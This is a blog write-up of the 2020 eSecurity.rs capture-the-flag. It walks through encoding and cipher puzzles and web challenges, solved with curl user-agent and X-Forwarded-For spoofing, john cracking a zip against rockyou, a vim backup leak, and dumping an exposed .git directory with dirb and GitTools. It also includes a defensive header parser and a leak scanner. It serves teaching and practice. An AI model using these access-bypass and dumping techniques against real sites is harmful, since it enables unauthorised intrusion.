CREATIVE CHAOS   ▋ blog

eSecurity.rs CTF

PUBLISHED ON 31/03/2020 — EDITED ON 11/12/2023 — INFOSEC

Pastebin style!

http://hfl.esecurity.rs:8000

Warming UP

1 Flag format is always esecurity{xxxxx}.

Can you find the first flag? ZXNlY3VyaXR5e3dhcm1pbmdfdXB9

base64

The F word

2 We’ve found this strange code and we’re unsure what it is. Can you help us and decode it and recover the flag?

JSFuck

This txt file wont open? Hm.

2 Can you open this file?

On Unix-like systems (macOS), nobody cares about extensions; magic bytes rule…

Can you see us?

3 Can you? http://178.22.217.52/canyouseeme/

Cookies

curl -I http://178.22.217.52/canyouseeme/

Some beeping sounds

4 We’ve discovered this strange audio file on one of our servers. It should contain the flag but we weren’t able to recover it. While trying to recover the flag 2 of our team members ended up like Jack Nicholson in The Shining. Third one ended up like Jack Nicholson in One Flew Over the Cuckoo’s Nest.

Hint: don’t forget about correct flag format: esecurity{XXXXXXX}

https://www.sonicvisualiser.org/download.html

--..-- --..-- -- --- .-. ... . .. ... ..-. ..- .- .. ... - .... . ..-. .-.. .- --. -... ..- - -.. --- -. - ..-. --- .-. --. . - - .... . -.-. ..- .-. .-.. - .-.. -... .-. .- -.-. -.- . - ...

https://cryptii.com/pipes/morse-code-to-text

Read the flag to get the answer.

Logo

5

Someone told us that there is something hidden in our logo. Could you please check and let us know?

$ exiftool
...
User Comment                    : 5c87N7XYVY7kmTLaVN5NU5smnqrL3adgwtSBPd5N
...

https://gchq.github.io/CyberChef/

Thanks to EK for cracking this one :D

Base58 (Bitcoin alphabet)
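How the Base58 decoding works, as an added example that is not part of the original write-up (CyberChef was used there). The function names are assumptions; the input is the User Comment value shown in the exiftool output above.

```python
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B58_INDEX = {ch: i for i, ch in enumerate(B58_ALPHABET)}


def b58decode(text):
    """Decode a Base58 string (Bitcoin alphabet) to bytes."""
    text = text.strip()
    num = 0
    for ch in text:
        if ch not in B58_INDEX:
            # 0, O, I and l are deliberately absent from the alphabet.
            raise ValueError(f"not a Base58 character: {ch!r}")
        num = num * 58 + B58_INDEX[ch]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Each leading '1' encodes one leading zero byte that the integer drops.
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def looks_like_base58(text):
    """Cheap triage for an unknown metadata string before trying decoders."""
    return bool(text) and all(ch in B58_INDEX for ch in text)


# Value copied from the exiftool "User Comment" field shown above.
USER_COMMENT = "5c87N7XYVY7kmTLaVN5NU5smnqrL3adgwtSBPd5N"

if __name__ == "__main__":
    print(looks_like_base58(USER_COMMENT), b58decode(USER_COMMENT))
```

The alphabet check is what separates this string from the Base64 ones elsewhere in the CTF: Base64 text usually contains characters (0, O, I, l, +, /, =) that Base58 never uses.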

How About Some Crypto?

5 We encrypted this flag very securely. There is no way you’ll be able to decode it.

Vigenère cipher, solved with dcode.fr

Robots

5

This challenge is not meant for you. See, you won’t be able to get the flag: http://hfl.esecurity.rs/robots/

curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" http://178.22.217.52/robots/flag/flag.txt

I was cool but now I just zip to forget :(

5 We’ve created this challenge but unfortunately we can’t remember the password. Guess there is no way to recover it now. Maybe we can throw rocks on it and hope it breaks open?

$ zip2john flag.zip > key.txt
kali@kali:~/Documents/esecurity$ john --format=zip --wordlist=/usr/share/wordlists/rockyou.txt key.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Badminton1234    (flag.zip/flag.txt)
1g 0:00:10:13 DONE (2020-03-31 14:48) 0.001629g/s 18526p/s 18526c/s 18526C/s Bado89..Badgirl01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/Documents/esecurity$ 7z e flag.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz (306F2),ASM,AES-NI)

Scanning the drive for archives:
1 file, 231 bytes (1 KiB)

Extracting archive: flag.zip
--
Path = flag.zip
Type = zip
Physical Size = 231


Enter password (will not be echoed):
Everything is Ok

Size:       39
Compressed: 231
kali@kali:~/Documents/esecurity$ cat flag.txt
esecurity{flag}

Home Sweet Home

6 Our security engineers hardened this flag so it’s only accessible within our own network. There is no way you’ll be able to recover it: http://hfl.esecurity.rs/fromhome/flag.txt

curl --header "X-Forwarded-For: 127.0.0.1" "http://hfl.esecurity.rs/fromhome/flag.txt"
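Why the header is enough, as an added example that is not the challenge's code: a server that takes the client address from X-Forwarded-For believes whatever the client sends, while the hardened variant only honours the header when the TCP peer is a known reverse proxy. The function names, the proxy address 10.0.0.5 and the sample requests are assumptions.

```python
import ipaddress

# Assumed deployment: one reverse proxy at this address (constructed value).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
INTERNAL_NETS = [ipaddress.ip_network("127.0.0.0/8"),
                 ipaddress.ip_network("10.0.0.0/8")]


def client_ip_naive(peer, headers):
    """Weak: believes the first X-Forwarded-For entry, whoever sent it."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer


def client_ip_hardened(peer, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    and walk the list right to left, skipping trusted proxy hops."""
    xff = headers.get("X-Forwarded-For")
    if ipaddress.ip_address(peer) not in TRUSTED_PROXIES or not xff:
        return peer
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: fall back to the socket address
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return peer


def is_internal(ip):
    """True when the address falls inside the assumed internal networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


# Constructed requests: (TCP peer address, request headers).
direct_spoof = ("203.0.113.7", {"X-Forwarded-For": "127.0.0.1"})
# The proxy appended the real client address after the client-supplied value.
via_proxy_spoof = ("10.0.0.5", {"X-Forwarded-For": "127.0.0.1, 203.0.113.7"})

if __name__ == "__main__":
    for peer, headers in (direct_spoof, via_proxy_spoof):
        print(peer, client_ip_naive(peer, headers),
              client_ip_hardened(peer, headers))
```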

Leak me

6 I just came here to show you my crazy php coding skillz: http://hfl.esecurity.rs/leakme/

this is my php script. actually it's not a php script, it's just text
file with a fancy extension.
Don't be harsh, I'm still learning this.
After almost 60 days stuck in it,
I've finally managed to learn how to exit vim but
during exiting I've probably made some changes
to vim configuration and some hackers told me that
now my source code is leaking.
Please don't hack me.

Vim saves backup files under the original name with a trailing ~.

http://hfl.esecurity.rs/leakme/index.php~

It Came From God

6 You’ll retrieve this flag only by praying

Image

https://en.wikipedia.org/wiki/The_Ciphers_of_the_Monks

https://www.asciitable.com

101 115 101 99 117 114 105 116 121 123 99 111 100 101 95 111 102 95 103 111 100 125

esecurity{xxx}

Easier way: https://www.dcode.fr/cistercian-numbers

Thanks to EK for cracking this one with me.

OSINT and Crypto

6

First you’ll need to find out who I am. That will help you to decode this message.

I’m the one who invented both of these things:

osintcrypto.txt

{"encrypted_flag" : "CNHPARVNE9MQ8YBVD9SPYVJZC5Q68QVMD1MQ6QVKEHS62VK7CNFP4RBKCMSK4Z8"}

json and encoding

https://en.wikipedia.org/wiki/Douglas_Crockford

https://www.dcode.fr/crockford-base-32-encoding

My Secure Blog

10 No more WordPress for me, I’m not a noob anymore. I’ve created this static html website, super secure, unhackable. WordPress is now removed and I have backups and version control. No way you’ll be able to hack me.

Check it out: http://178.22.217.52/mysecureblog/

Source:

<!--Don't forget to remove version-control system from web root before deployment -->
kali@kali:~/opt/dvcs-ripper$ dirb http://178.22.217.52/mysecureblog/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Apr  1 12:25:28 2020
URL_BASE: http://178.22.217.52/mysecureblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://178.22.217.52/mysecureblog/ ----
+ http://178.22.217.52/mysecureblog/.git/HEAD (CODE:200|SIZE:23)
+ http://178.22.217.52/mysecureblog/index.html (CODE:200|SIZE:1614)

-----------------
END_TIME: Wed Apr  1 12:28:29 2020
DOWNLOADED: 4612 - FOUND: 2

http://178.22.217.52/mysecureblog/.git/HEAD

ref: refs/heads/master

http://178.22.217.52/mysecureblog/.git/config

https://github.com/internetwache/GitTools

kali@kali:~/opt/GitTools/Dumper$ ./gitdumper.sh http://178.22.217.52/mysecureblog/.git/ aa
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating aa/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/39/42bcae4b0bee131298b40f4a7c5afcb490fab2
[-] Downloaded: objects/00/00000000000000000000000000000000000000
...
kali@kali:~/opt/GitTools/Extractor/aa$ ./extractor.sh ../Dumper/aa/ aa
kali@kali:~/opt/GitTools/Extractor/aa/0-3942bcae4b0bee131298b40f4a7c5afcb490fab2$ grep -H esecurity *
grep: css: Is a directory
grep: images: Is a directory
grep: includes: Is a directory
grep: js: Is a directory
grep: maint: Is a directory
grep: network: Is a directory
grep: user: Is a directory
users.php:secret esecurity stuff: ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
kali@kali:~/Documents/esecurity/aa$ echo 'ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9' | base64 -d
esecurity{FLAG}
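A pre-deployment check for the two leaks used in Leak me and My Secure Blog (an editor backup file and a .git directory under the web root), as an added example that is not part of the original write-up. The pattern list goes a little beyond the page (Vim swap files, .svn, .hg, .bak), the function names are assumptions, and the sample tree is constructed.

```python
import fnmatch
import os
import tempfile

# Directory names that expose repository history when served (e.g. /.git/HEAD).
VCS_DIRS = {".git", ".svn", ".hg"}
# Editor leftovers that are served as plain text instead of being executed.
BACKUP_PATTERNS = ["*~", "*.swp", "*.swo", "*.bak"]


def find_leaks(web_root):
    """Return sorted (relative_path, reason) pairs for entries that should
    not be deployed under web_root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(web_root):
        for d in list(dirnames):
            if d in VCS_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, d), web_root)
                findings.append((rel, "version-control metadata"))
                dirnames.remove(d)  # do not descend into the repository
        for name in filenames:
            if any(fnmatch.fnmatch(name, p) for p in BACKUP_PATTERNS):
                rel = os.path.relpath(os.path.join(dirpath, name), web_root)
                findings.append((rel, "editor backup or swap file"))
    return sorted(findings)


def build_sample_root():
    """Constructed tree mirroring the two challenges: index.php~ and .git/."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in ["index.html", "leakme/index.php", "leakme/index.php~",
                "leakme/.index.php.swp", ".git/HEAD", ".git/config"]:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    return root


if __name__ == "__main__":
    for rel, reason in find_leaks(build_sample_root()):
        print(f"{rel}: {reason}")
```

Run against the real document root in the deployment pipeline and fail the build when the list is not empty; blocking dot-directories and backup suffixes in the web server configuration covers anything that slips through.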

RANDOM

import codecs
codecs.decode('aa','rot_13')
codecs.encode('nn','rot_13')
